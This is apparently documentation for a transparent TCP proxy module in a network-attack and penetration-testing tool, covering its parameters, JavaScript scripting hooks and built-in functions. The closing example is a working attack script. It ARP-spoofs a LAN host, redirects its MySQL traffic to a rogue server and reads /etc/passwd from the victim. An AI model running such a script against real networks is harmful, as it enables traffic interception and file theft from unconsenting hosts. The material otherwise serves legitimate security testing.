tcp.proxy

A TCP transparent proxy that can be scripted using javascript modules. If used together with a spoofer, all TCP traffic to a given address and port will be redirected to it and it will automatically handle port redirections as needed.

The optional tcp.tunnel parameter can be used to redirect the traffic from tcp.address to tcp.tunnel.address.

Commands

tcp.proxy on

Start the TCP proxy.

tcp.proxy off

Stop the TCP proxy.

Parameters

parameterdefaultdescription
tcp.port443TCP port to redirect when the proxy is activated.
tcp.addressMandatory remote address of the TCP proxy.
tcp.proxy.port8443Port to bind the TCP proxy to.
tcp.proxy.address<interface address>Address to bind the TCP proxy to.
tcp.proxy.scriptPath of a proxy module script.
tcp.tunnel.addressAddress to redirect the TCP tunnel to (optional).
tcp.tunnel.portPort to redirect the TCP tunnel to (optional)

Modules

The tcp.proxy module can be scripted using javascript files that must declare at least one of the following functions:

  1. // called when the script is loaded
  2. function onLoad() {
  3. }
  4. // called when data is available
  5. // return an array of bytes to override "data"
  6. function onData(from, to, data) {
  7. }

Modules can change the data buffer and return it, signaling the proxy to override the original buffer.

Builtin Functions

Modules can use the following builtin functions.

functiondescription
readDir(“/path/“)Return the contents of a directory as a string array.
readFile(“/path/to/file”)Return the contents of a file as a string.
writeFile(“/path/to/file”, “hello world”)Write the string hello world to a file, returns null or an error message.
log_debug(“message”)Log a message in the interactive session (its level will be DEBUG).
log_info(“message”)Log a message in the interactive session (its level will be INFO).
log_warn(“message”)Log a message in the interactive session (its level will be WARNING).
log_error(“message”)Log a message in the interactive session (its level will be ERROR).
log_fatal(“message”)Log a message in the interactive session (its level will be FATAL).
log(“message”)Shortcut for log_info(“message”).
btoa(“message”)Encode a message to base64.
atob(“bWVzc2FnZQ==”)Decode a message from base64.
gzipCompress(“plaintext data”)Compress a string using gzip encoding.
gzipDecompress(“)9�+�I��+I�(QHI,I����”)Decompress a gzip encoded string.
env(“iface.ipv4”)Read a variable.
env(“foo”, “bar”)Set a variable.

Examples

The rogue-mysql-server.cap executes an ARP spoofing attack against a single host and redirect the MySQL traffic to a builtin rogue server:

  1. # set the target for arp spoofing
  2. set arp.spoof.targets 192.168.1.236
  3. # bind rogue mysql server to localhost and
  4. # set the file we want to read
  5. set mysql.server.address 127.0.0.1
  6. set mysql.server.port 3306
  7. set mysql.server.infile /etc/passwd
  8. mysql.server on
  9. # set the ip from the mysql server we want to impersonate
  10. set tcp.address 93.184.216.34
  11. set tcp.port 3306
  12. # set the ip from the rogue mysql server
  13. set tcp.tunnel.address 127.0.0.1
  14. set tcp.tunnel.port 3306
  15. # go ^_^
  16. tcp.proxy on
  17. arp.spoof on